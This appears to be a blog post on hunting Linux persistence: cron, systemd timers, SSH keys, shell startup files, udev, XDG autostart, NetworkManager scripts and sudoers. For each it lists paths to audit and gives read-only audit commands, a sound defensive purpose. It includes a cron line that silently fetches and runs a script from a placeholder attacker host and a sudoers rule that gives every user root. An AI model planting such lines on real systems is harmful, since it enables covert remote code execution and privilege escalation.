With the adoption of systemd in most modern Linux distributions, systemd timers have emerged as a powerful and flexible way to schedule tasks. Much like Windows Scheduled Tasks, these timers can initiate background services at specific times or intervals.

How They Work
systemd timers work in tandem with systemd service units. Typically, a timer will have a corresponding service file with the same base name. For instance:
data_exfil.timer → triggers data_exfil.service
However, you can also explicitly define the service to trigger by adding Unit=custom.service in the .timer file.

Key systemd Timer Commands
For managing systemd timers on a live system, use the following:
systemctl enable <name>.timer – Enables the timer to start at boot
systemctl start <name>.timer – Starts the timer immediately
systemctl status <name>.timer – Displays the current status, including the last and next trigger times

Why Use systemd Timers?
Granular control over execution intervals
Integration with other systemd features (dependencies, logging, etc.)
More readable and maintainable compared to complex cron entries

2. Cron Jobs
Cron has long been the go-to tool for task scheduling in Unix and Linux environments. It's simple, reliable, and nearly universal.

Format
<minute> <hour> <day of month> <month> <day of week> <command>
minute (0 - 59)
hour (0 - 23)
day of the month (1 - 31)
month of the year (1 - 12)
day of the week (0 - 7; 0/7 = SUN)
( * ) = wildcard for any value
( , ) = list multiple values
( - ) = specify a range
( / ) = set increments within a range

How It Works
Cron jobs are defined in crontab files, whose entries contain six fields: the five scheduling fields above, followed by the command to run. For example:
*/30 * * * * wget -q -O - http://<attacker_host>/attack.sh | sh
This example runs a command every 30 minutes, silently fetching and executing a remote script — a classic example of how cron can be used maliciously.

Crontab Commands
Use these on a live system to inspect cron jobs:
crontab -l – Lists the current user's cron jobs

Cron File Locations
On Debian-based systems, cron-related files are typically found in:
/var/spool/cron/crontabs – per-user cron jobs
/etc/cron.d/, /etc/cron.daily/, /etc/cron.hourly/ – system-wide jobs

Why Use Cron?
Universally supported across Unix-like systems
Lightweight and straightforward
Does not require systemd
---------------------------------------------------------------------------------------------------------
Other Persistence Mechanisms

1. SSH as a Persistence Mechanism
SSH is one of the most reliable methods for attackers to maintain persistent access to a compromised system. There are two primary types of SSH authentication: password-based and key-based. While password-based authentication is common, key-based authentication is often favored for persistence due to its robustness and ease of use.

How It Works
An attacker generates a public/private key pair on their own machine and then places the public key into the victim system's ~/.ssh/authorized_keys file. This allows them to authenticate to the system without providing a password. Key-based SSH authentication is popular because, once set up, the attacker can access the system remotely and continuously, even if the initial password is changed.

To check for this persistence, system administrators should audit the following location for every user:
/home/<user>/.ssh/authorized_keys
If an unfamiliar key is present, it could indicate unauthorized access. A quick audit sweep is sketched below.
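Here is a minimal sketch of that authorized_keys audit, assuming a standard /home layout (service accounts with non-standard home directories will need extra paths):

# Show modification times for every authorized_keys file, newest first
find /home /root -maxdepth 3 -path '*/.ssh/authorized_keys' -exec stat -c '%y  %n' {} \; 2>/dev/null | sort -r
# Dump the keys themselves so unfamiliar entries stand out
find /home /root -maxdepth 3 -path '*/.ssh/authorized_keys' -exec cat {} \; 2>/dev/null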
2. Bash Configuration Files
Another method for creating persistence on a compromised system involves manipulating Bash configuration files. These files are typically executed when a user logs into a Bash shell, making them ideal for executing malicious scripts or commands automatically.

Key Files to Review
Per-User Files:
/home/<user>/.bashrc
/home/<user>/.bash_profile
These files are executed each time a user opens a new terminal session. If an attacker has modified them, they may have inserted a script that runs malicious commands.

Other Per-User Bash Files:
/home/<user>/.bash_login
/home/<user>/.bash_logout
These files are executed during user login and logout events. Any modifications should be carefully reviewed.

System-Wide Files:
/etc/bash.bashrc
/etc/profile
/etc/profile.d/*
The system-wide configuration files affect all users and may contain an attacker's code or scripts. Check the modification timestamps for any unexpected changes.

rc.local:
/etc/rc.local (if it exists)
This file, if present, runs scripts at system startup. While it might not exist by default on all systems, attackers can create it and add malicious commands to execute on boot.

3. udev Rules
udev is the device manager for the Linux kernel, responsible for managing device nodes in /dev. Attackers can exploit this by creating custom udev rules that trigger scripts based on hardware events, such as when a USB device is connected.

Key Files to Check
/etc/udev/rules.d/
Review the files in this directory for any new or suspicious rules that might automatically execute a script when specific hardware is connected (e.g., a USB stick).

4. XDG Autostart
On systems with a graphical user interface (GUI), attackers may place scripts in directories related to XDG autostart. These scripts are automatically executed when the desktop environment starts, ensuring that malicious processes launch every time the user logs in.

Key Files to Review
System-wide: /etc/xdg/autostart/
Per-user: /home/<user>/.config/autostart/
Any unfamiliar script in these directories could be a sign of persistent malware that runs whenever a user logs into the graphical environment.

5. NetworkManager Scripts
NetworkManager is responsible for managing network connections on Linux systems. Attackers can exploit it by placing scripts in NetworkManager's dispatcher directory to trigger actions during network events, such as when a specific network interface comes online.

Key Files to Review
/etc/NetworkManager/dispatcher.d/
Scripts in this directory are executed whenever network interfaces change state. Reviewing these files can reveal hidden scripts designed to execute during network events.

6. Modifying Sudoers for Elevated Privileges
Attackers often modify system configurations to ensure they can escalate privileges or maintain administrative access. One way to do this is by editing the sudoers file, which controls which users can run specific commands as root.

Example Sudoers Entry:
ALL ALL=(ALL:ALL) ALL
This entry allows any user to execute any command as any other user, including root. Attackers might add themselves (or a rule like this) to the file to gain elevated privileges at will.

To check for unauthorized changes:
Use visudo to safely inspect and edit /etc/sudoers (it validates syntax before saving).
Look for unusual users or commands in the sudoers file (and in /etc/sudoers.d/) that could grant an attacker unrestricted access.

A combined audit sweep covering sections 2 through 6 is sketched below.
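To tie sections 2 through 6 together, here is a minimal, read-only audit sketch. Paths assume a Debian-style layout with standard home directories; treat it as a starting point rather than a complete IR collection script:

#!/bin/bash
# Persistence sweep (sketch): list modification times for common shell-startup persistence spots
for f in /home/*/.bashrc /home/*/.bash_profile /home/*/.bash_login /home/*/.bash_logout \
         /etc/bash.bashrc /etc/profile /etc/profile.d/* /etc/rc.local; do
    [ -f "$f" ] && stat -c '%y  %n' "$f"
done | sort -r

# Event-triggered locations: udev rules, XDG autostart, NetworkManager dispatcher
ls -la /etc/udev/rules.d/ /etc/xdg/autostart/ /home/*/.config/autostart/ \
       /etc/NetworkManager/dispatcher.d/ 2>/dev/null

# Sudoers: surface broad grants for manual review
grep -R "ALL" /etc/sudoers /etc/sudoers.d/ 2>/dev/null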
Conclusion
Persistence is a critical phase of the attack lifecycle. A comprehensive security audit should cover not just user accounts and SSH keys, but also background services, startup scripts, scheduled tasks, and even device event triggers. By understanding the various persistence mechanisms — from traditional cron jobs to modern systemd timers — security professionals can more effectively hunt, detect, and respond to adversarial activity before it escalates into a larger breach.

Key Takeaway: Effective persistence hunting means combining file integrity monitoring, service auditing, and user account audits into a regular security strategy.
------------------------------------------Dean----------------------------------------------------------








